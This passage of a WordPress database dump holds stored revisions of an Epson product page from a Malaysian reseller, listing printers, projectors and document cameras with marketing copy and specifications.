]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 17:16:05','2019-09-25 09:16:05','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3465,1,'2019-09-25 17:17:51','2019-09-25 09:17:51','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson WorkForce AL-M8100DNÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></h4><p><br /><br />Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<p><strong>Epson TM-H6000IVÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T88V-iÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T70IIÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>[maxbutton id=\"12\" ]		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 17:17:51','2019-09-25 09:17:51','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0);
INSERT INTO `wpdp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES (3473,1,'2019-09-25 17:30:15','2019-09-25 09:30:15','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the 